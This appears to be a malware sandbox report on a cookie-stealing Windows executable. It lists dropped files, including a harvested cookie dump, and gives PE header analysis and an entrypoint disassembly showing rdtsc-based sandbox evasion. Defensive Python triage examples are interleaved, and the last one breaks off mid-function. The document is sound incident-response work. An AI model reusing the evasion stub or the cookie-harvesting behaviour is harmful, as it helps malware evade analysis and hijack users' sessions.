                                                                                                                                                SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):103632
                                                                                                                                                Entropy (8bit):6.404475911013687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.txt
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23914
                                                                                                                                                Entropy (8bit):3.719911941386575
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:b3r3Ii3M35gYs3b370v323V3b3h7I67T3qihW/j+es8JlkS3D:bb/cJgYsLL0vmFLR7IUqmR8JlkS3D
                                                                                                                                                MD5:A8B67189AA1F9DAA1DF00583F7A3DA6F
                                                                                                                                                SHA1:0D5F62621E11E7EBA831576B56FADAED57D31DCA
                                                                                                                                                SHA-256:5A427E57B186089AAC42F1C00D9D88ACCCAD0E1C0423BEFA769A7E72E9F826E6
                                                                                                                                                SHA-512:673F9D7CA779F4E136503B6A0B2914BA24E28E23EA78503D9A47308030C02E52A5C95445EC396399ED0DE578F0ED89E5E1038F573A666D71693FAE19F23EF4BA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.1. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".m.a.r.k.e.t.P.r.e.f.".,.....".V.a.l.u.e.".:.".d.e.-.c.h.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".Y.e.s.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".2.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.0.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.5.4.:.5.0. .P.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.2.0. .1.2.:.5.4.:.5.0. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.s.n...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".P.r.e.f.e.r.e.n.c.e.s.M.s.n.".,.....".V.a.l.u.e.".:.".e.y.J.F.e.H.B.p.c.n.l.U.a.W.1.l.I.j.o.2.M.z.c.y.O.D.g.1.O.T.M.z.N.j.g.z.N.j.I.z.M.D.U.s.I.l.Z.l.c.n.N.p.b.2.4.i.O.j.F.9.0.".,...
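The file above is what the dropped 1611970637183.exe wrote: a UTF-16 LE JSON array of cookie records (Modified Time, Expire Time, Host Name, Path, Name, Value, Secure, HTTP Only, Host Only, Entry ID and Table Name CookieEntryEx_10) exported from a browser cookie store, which is the concrete output behind the browser-harvesting behaviour. The number in the file names is a millisecond Unix timestamp, so 1611970637183 places the dump at 2021-01-30 01:37:17 UTC. For incident response the questions that matter are which hosts' cookies were exposed, which of them protect sessions (Secure, HttpOnly) and how many were still valid when the dump was taken, since those sessions need to be revoked. As an added example, not code from the report or from the sample, this Python decodes such a dump and answers those questions. The three records it runs on are constructed to match the visible field layout (the two msn.com entries follow the preview, the login.example.test entry is invented) and are not the dropped file's contents; the expiry comparison treats the dump's local timestamps as UTC, which is an approximation.

```python
import json
from collections import Counter
from datetime import datetime, timezone

TIME_FORMAT = "%m/%d/%Y %I:%M:%S %p"   # the dump's own format, e.g. 6/27/2019 12:54:50 PM


def epoch_ms_to_utc(ms: int) -> str:
    """The dropped files are named with millisecond Unix timestamps."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_cookie_export(raw: bytes) -> list:
    """Decode a UTF-16 LE JSON cookie dump (BOM optional, CRLF whitespace) into dicts."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    records = json.loads(raw.decode("utf-16-le"))
    if not isinstance(records, list):
        raise ValueError("expected a JSON array of cookie records")
    return records


def summarize_cookies(records: list, as_of_utc: str) -> dict:
    """Which hosts' cookies were taken, how many carry Secure/HttpOnly, and how
    many were still unexpired at as_of_utc ('YYYY-MM-DD HH:MM:SS'). The dump's
    Expire Time values are compared as if they were UTC (approximation)."""
    as_of = datetime.strptime(as_of_utc, "%Y-%m-%d %H:%M:%S")
    hosts = Counter(r["Host Name"] for r in records)
    live = [r for r in records if datetime.strptime(r["Expire Time"], TIME_FORMAT) > as_of]
    return {
        "total": len(records),
        "hosts": dict(hosts),
        "secure": sum(r.get("Secure") == "Yes" for r in records),
        "http_only": sum(r.get("HTTP Only") == "Yes" for r in records),
        "unexpired": len(live),
        "unexpired_hosts": sorted({r["Host Name"] for r in live}),
        "tables": sorted({r.get("Table Name", "") for r in records}),
    }


# Constructed records (not the dropped file): the two msn.com entries copy the
# field layout visible in the preview, the third is invented to show a cookie
# that was still valid when the dump was made. Values are placeholders.
SAMPLE_RECORDS = [
    {"Modified Time": "6/27/2019 12:54:50 PM", "Expire Time": "6/27/2020 12:54:51 PM",
     "Host Name": "msn.com", "Path": "/", "Name": "marketPref", "Value": "de-ch",
     "Secure": "No", "HTTP Only": "Yes", "Host Only": "No", "Entry ID": "2",
     "Table Name": "CookieEntryEx_10"},
    {"Modified Time": "6/27/2019 12:54:50 PM", "Expire Time": "6/27/2020 12:54:50 PM",
     "Host Name": "msn.com", "Path": "/", "Name": "PreferencesMsn", "Value": "constructed-value",
     "Secure": "No", "HTTP Only": "No", "Host Only": "No", "Entry ID": "3",
     "Table Name": "CookieEntryEx_10"},
    {"Modified Time": "1/20/2021 9:05:12 AM", "Expire Time": "1/20/2022 9:05:12 AM",
     "Host Name": "login.example.test", "Path": "/", "Name": "SID",
     "Value": "constructed-session-token", "Secure": "Yes", "HTTP Only": "Yes",
     "Host Only": "Yes", "Entry ID": "4", "Table Name": "CookieEntryEx_10"},
]
# Serialised the way the dropped file is laid out: UTF-16 LE with BOM and CRLF line ends.
SAMPLE_EXPORT = ("\ufeff" + json.dumps(SAMPLE_RECORDS, indent=1).replace("\n", "\r\n")).encode("utf-16-le")

if __name__ == "__main__":
    dumped_at = epoch_ms_to_utc(1611970637183)
    summary = summarize_cookies(parse_cookie_export(SAMPLE_EXPORT), dumped_at)
    print("dump taken", dumped_at, "UTC")
    print(summary)
```

Run against the real 1611970637183.txt the unexpired_hosts list is the set of sites whose sessions should be invalidated first; cookies that were already expired at dump time still tell you which accounts the user had, but they cannot be replayed.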

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):7.867812997543559
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Cyfj6XGbkd.exe
                                                                                                                                                File size:4247224
                                                                                                                                                MD5:63204eb716c856723a010747d58a6b00
                                                                                                                                                SHA1:7e97f00b4c3580cedee02c448ac9aeb54afefbd2
                                                                                                                                                SHA256:6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
                                                                                                                                                SHA512:4b00dc3d824d3526972f74b913cff2b1d0e12745de58bfe4ba6196088a17b2346b4ec019bdf923acc57c77f88aa7b17fa230100c6c35b6672c7a39bfa4953c2e
                                                                                                                                                SSDEEP:49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
                                                                                                                                                File Content Preview:MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:b595139bec4252a9
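The Static File Info above reports an 8-bit entropy of 7.87 for the 4 MB sample, which is the signature of a compressed or encrypted payload carried inside the executable, and the Static PE Info that follows gives the header facts: entry point 0x403bc3 in .text, image base 0x400000, time stamp 0x56250B1B, RELOCS_STRIPPED set and an empty DLL Characteristics field, so the image has no relocation data, cannot be rebased and always loads at 0x400000. Digitally signed:true only records that a signature blob is attached; on its own it says nothing about who signed it or whether the chain validates, and the build time stamp is written by whoever built the file, so neither should carry weight in triage. As an added example that is not part of this report or of the sandbox's own tooling, the following stdlib-only Python derives the same header fields from a PE image, computes the entropy figure, and flags any section that is both writable and executable. It runs against a constructed minimal PE32 image whose header mirrors the reported values; those bytes are not the sample's, and marking .text writable in it is an assumption made to exercise that check.

```python
import math
import struct
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (PE/COFF specification)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
# IMAGE_SECTION_HEADER.Characteristics bits
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 to 8.0; packed or encrypted payloads sit close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def analyze_pe(data: bytes) -> dict:
    """Read the COFF header, optional header and section table and derive what a
    triage report lists: build time, characteristics, entry point and its
    section, and every section that is both writable and executable."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:      # PE32: ImageBase is a DWORD at offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:    # PE32+: ImageBase is a QWORD at offset 24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)

    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("latin-1"),
                         "rva": f[2], "vsize": f[1], "flags": f[9]})

    def contains(sec, rva):
        return sec["rva"] <= rva < sec["rva"] + max(sec["vsize"], 1)

    entry_section = next((s["name"] for s in sections if contains(s, entry_rva)), None)
    writable_code = [s["name"] for s in sections
                     if s["flags"] & SCN_MEM_WRITE and s["flags"] & (SCN_MEM_EXECUTE | SCN_CNT_CODE)]
    return {
        "machine": machine,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": {name for bit, name in FILE_CHARACTERISTICS.items() if chars & bit},
        "entry_point": image_base + entry_rva,
        "entry_section": entry_section,
        "writable_code_sections": writable_code,
        "sections": sections,
    }


def build_test_pe() -> bytes:
    """Constructed minimal PE32 image (not the sample's bytes). Header fields mirror
    the report: entry 0x403bc3, image base 0x400000, time stamp 0x56250B1B,
    characteristics 0x010F. .text is also marked writable (assumption, to
    exercise that check); the section bodies are absent, only headers matter here."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x014C, 2, 0x56250B1B, 0, 0, 0xE0, 0x010F)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3BC3)      # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x4000, 0x1000, 0x4000, 0x400, 0, 0, 0, 0,
                       SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE)
    data_sec = struct.pack("<8sIIIIIIHHI", b".data", 0x1000, 0x5000, 0x1000, 0x4400, 0, 0, 0, 0,
                           SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE)
    return dos + b"PE\0\0" + coff + bytes(opt) + text + data_sec


if __name__ == "__main__":
    image = build_test_pe()
    report = analyze_pe(image)
    print("built", report["timestamp_utc"], "UTC, entry 0x%x in %s" % (report["entry_point"], report["entry_section"]))
    print("characteristics", sorted(report["characteristics"]))
    print("writable+executable sections", report["writable_code_sections"])
    print("entropy of a 0..255 byte ramp: %.2f" % shannon_entropy(bytes(range(256))))
```

Point analyze_pe at the real sample by reading the file into bytes; a writable .text section, relocations stripped and an empty DLL Characteristics field together mean the code can patch itself in place at a fixed address, which is what an unpacking stub needs and what the "creates a PE file in dynamic memory" behaviour is consistent with.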

Static PE Info

General

Entrypoint: 0x403bc3
Entrypoint Section: .text
Digitally signed: true (a certificate table is attached; see Authenticode Signature and IMAGE_DIRECTORY_ENTRY_SECURITY below for what that does and does not establish)
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: none (no DYNAMIC_BASE, so together with RELOCS_STRIPPED the image always maps at 0x400000; no NX_COMPAT, so it does not opt in to DEP)
Time Stamp: 0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks: none
CLR (.Net) Version: none (native code)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Every field in this block is empty in the report. It records that a certificate table is attached (IMAGE_DIRECTORY_ENTRY_SECURITY, file offset 0xd2000, 0x1eb8 bytes, under Data Directories) but neither an issuer nor a validation result, so "Digitally signed: true" above means only that a signature blob exists, not that it verifies or whom it names. Verify the chain separately before treating the vendor strings under Version Infos as authenticated.

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain
  Version:
  Thumbprint MD5:
  Thumbprint SHA-1:
  Thumbprint SHA-256:
  Serial:

Entrypoint Preview

The disassembly at the entrypoint (0x403bc3) is dominated by five copies of one timing idiom: pushfd/pushad, two back-to-back rdtsc reads whose low dwords are subtracted (xor ecx, ecx; rdtsc; mov ecx, eax; xor eax, eax; rdtsc; sub ecx, eax; cmp ecx, 0; jne), a run of instructions that operate on registers the stub never set up, then popad/popfd. On hardware the two readings differ by at least the latency of rdtsc itself, so the jne is taken every time; only an environment that hands back a constant time-stamp counter falls through into the run after it. Because the bracket saves and restores every register and the flags, the idiom is invisible to the code around it, which, if each jne resumes at its matching popad, reduces to: push ebp / mov ebp, esp / sub ebp, 18h / mov dword ptr [ebp-14h], 00403BC3h / push 00000005h / mov eax, 00403F45h / push eax / push 000013C5h / push 00000079h. The jne targets are printed at addresses such as 00007F47FD019EA3h, which lie far outside the image (base 0x400000) and are a rendering artefact of the disassembler, not locations in the file.

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019EA3h
mov eax, dword ptr [edx]
mov esi, esp
mov ecx, esi
push edx
call edi
mov ebx, dword ptr [ebx]
add ebx, eax
mov edx, dword ptr [edx]
mov ebx, dword ptr [ebx]
popad
popfd
push 00000005h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Fh
pop ebx
inc edi
mov ecx, esi
mov ebx, dword ptr [esp]
mov ecx, dword ptr [ebx]
call dword ptr [eax]
mov ebp, ecx
popad
popfd
mov eax, 00403F45h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Ch
mov ecx, dword ptr [ecx]
mov ecx, esi
mov ecx, ebp
cmp eax, edx
mov edi, ebp
popad
popfd
push eax
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019EA1h
mov eax, dword ptr [ebp+00h]
dec eax
imul eax, edx
mov edx, dword ptr [eax]
mov ebx, dword ptr [ecx]
add eax, edx
push ecx
pop eax
popad
popfd
push 000013C5h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Eh
mov eax, ebx
call esi
mov ecx, dword ptr [edi]
imul eax, edx
call dword ptr [ebx]
dec edx
popad
popfd
push 00000079h
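The idiom repeats often enough that it is worth recognising mechanically rather than by eye. The Python below is an added example, not code from the report or the sample: it embeds the first 26 instructions of the listing as constructed sample input, locates each pushfd/pushad ... rdtsc/rdtsc/sub/cmp/jne ... popad/popfd block, counts the filler after the jne that only runs when the two readings are equal, and returns the instructions that remain. The stripped view rests on the assumption, stated in the code and not checkable from the printed jump targets, that each jne lands on its matching popad.

```python
import re

# Constructed sample input: the first 26 instructions of the report's
# entrypoint listing, one per line, exactly as the report prints them.
LISTING = """\
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019EA3h
mov eax, dword ptr [edx]
mov esi, esp
mov ecx, esi
push edx
call edi
mov ebx, dword ptr [ebx]
add ebx, eax
mov edx, dword ptr [edx]
mov ebx, dword ptr [ebx]
popad
popfd
push 00000005h
"""

# The timing idiom: two rdtsc reads, low dwords subtracted, branch on non-zero.
RDTSC_DELTA_CHECK = [
    r"xor ecx, ecx", r"rdtsc", r"mov ecx, eax", r"xor eax, eax", r"rdtsc",
    r"sub ecx, eax", r"cmp ecx, 0+h", r"jne .+",
]


def _idiom_at(low, i):
    """True when the lower-cased instruction list matches the idiom starting at index i."""
    n = len(RDTSC_DELTA_CHECK)
    return i + n <= len(low) and all(
        re.fullmatch(p, low[i + k]) for k, p in enumerate(RDTSC_DELTA_CHECK))


def find_rdtsc_checks(listing):
    """Locate every rdtsc delta check and measure the filler that follows its jne."""
    ins = [line.strip() for line in listing.splitlines() if line.strip()]
    low = [x.lower() for x in ins]
    hits = []
    for i in range(len(low)):
        if not _idiom_at(low, i):
            continue
        after_jne = i + len(RDTSC_DELTA_CHECK)
        j = after_jne
        while j < len(low) and low[j:j + 2] != ["popad", "popfd"]:
            j += 1
        hits.append({
            "index": i,
            # pushfd/pushad before and popad/popfd after: registers and flags survive the check
            "state_preserving": low[i - 2:i] == ["pushfd", "pushad"] and j < len(low),
            "filler_insns": j - after_jne,  # executed only if both rdtsc reads were equal
        })
    return hits


def strip_timing_blocks(listing):
    """Instructions that run when every delta is non-zero.

    Assumption (not verifiable from the printed targets): each jne resumes at
    the popad that closes its own pushfd/pushad bracket.
    """
    ins = [line.strip() for line in listing.splitlines() if line.strip()]
    low = [x.lower() for x in ins]
    out, i = [], 0
    while i < len(ins):
        if low[i:i + 2] == ["pushfd", "pushad"] and _idiom_at(low, i + 2):
            j = i + 2 + len(RDTSC_DELTA_CHECK)
            while j < len(low) and low[j:j + 2] != ["popad", "popfd"]:
                j += 1
            i = j + 2          # skip past popad/popfd
            continue
        out.append(ins[i])
        i += 1
    return out


if __name__ == "__main__":
    for hit in find_rdtsc_checks(LISTING):
        print(hit)
    print(strip_timing_blocks(LISTING))
```

Feeding the full listing from the report yields five hits; the patterns are deliberately literal because the stub reuses the same register choice in every copy, so a variant that swaps registers would need its own entry rather than a looser regex that also matches benign rdtsc use.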

Rich Headers

Programming Language:
• [C++] VS98 (6.0) SP6 build 8804
• [EXP] VC++ 6.0 SP5 build 8804
• [ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb8f0 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0xc0590 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd2000 | 0x1eb8 | (file offset, not an RVA: the certificate table is appended to the file and not mapped into any section)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x1c4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9276 | 0xa000 | False | 0.565625 | data | 6.61275809173 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x12dc | 0x2000 | False | 0.28466796875 | data | 3.67874100082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xd000 | 0x4ea4 | 0x4000 | False | 0.1611328125 | data | 1.88336858311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x12000 | 0xc0590 | 0xc1000 | False | 0.293020614071 | data | 5.94457194459 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Two things stand out. .text carries IMAGE_SCN_MEM_WRITE alongside IMAGE_SCN_CNT_CODE and IMAGE_SCN_MEM_EXECUTE, which is not what the VC++ 6.0 linker identified in the Rich header emits by default (code sections are EXECUTE|READ) and is consistent with a stub that decrypts or patches its own code at run time, matching the rdtsc-laden entrypoint above. And .rsrc (0xc1000 raw bytes) dwarfs the code (0xa000): almost the whole file is resource data, chiefly the 0xbf518-byte RT_BITMAP listed under Resources.
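The General, Data Directories and Sections tables above are what a reviewer checks first: a writable code section, a fixed image base with relocations stripped, empty DLL Characteristics, and a certificate table whose validity the report does not establish. The Python below is an added example, not code from the report or the sample. It builds a constructed PE32 header from exactly the values shown on this page with struct, so it runs offline, parses that header back, and emits the findings; pass the bytes of a real file to triage() to run it on one. Fields the page does not show (linker version, SizeOfCode, SizeOfInitializedData, stack and heap sizes) are assumed filler in the constructed header.

```python
import struct

# Flag values from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DIRECTORY_ENTRY_SECURITY = 4

OPT32_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6  # PE32 optional header, 96 bytes
SECTION_FMT = "<8sIIIIIIHHI"                                     # IMAGE_SECTION_HEADER, 40 bytes


def build_sample_image():
    """Constructed PE32 header carrying the report's values; not the analysed file itself."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew -> 0x40
    # i386, 4 sections, TimeDateStamp 0x56250B1B, 0xE0-byte optional header,
    # Characteristics = RELOCS|EXECUTABLE|LINE_NUMS|LOCAL_SYMS stripped + 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 4, 0x56250B1B, 0, 0, 0xE0, 0x010F)
    opt = struct.pack(OPT32_FMT, 0x10B, 6, 0, 0xA000, 0xC7000, 0, 0x3BC3, 0x1000, 0xB000,
                      0x400000, 0x1000, 0x1000, 4, 0, 4, 0, 4, 0, 0, 0xD3000, 0x1000, 0,
                      2, 0,                       # Subsystem GUI, DllCharacteristics empty
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)   # assumed filler sizes
    dirs = [(0, 0)] * 16
    dirs[1] = (0xB8F0, 0x8C)       # IMPORT, in .rdata
    dirs[2] = (0x12000, 0xC0590)   # RESOURCE, in .rsrc
    dirs[4] = (0xD2000, 0x1EB8)    # SECURITY: a file offset, not an RVA
    dirs[12] = (0xB000, 0x1C4)     # IAT, in .rdata
    secs = [
        (".text", 0x1000, 0x9276, 0xA000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (".rdata", 0xB000, 0x12DC, 0x2000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
        (".data", 0xD000, 0x4EA4, 0x4000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (".rsrc", 0x12000, 0xC0590, 0xC1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    ]
    return (dos + b"PE\0\0" + coff + opt
            + b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
            + b"".join(struct.pack(SECTION_FMT, n.encode().ljust(8, b"\0"), vs, va, rs, 0, 0, 0, 0, 0, ch)
                       for n, va, vs, rs, ch in secs))


def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> PE32 optional header -> data dirs -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
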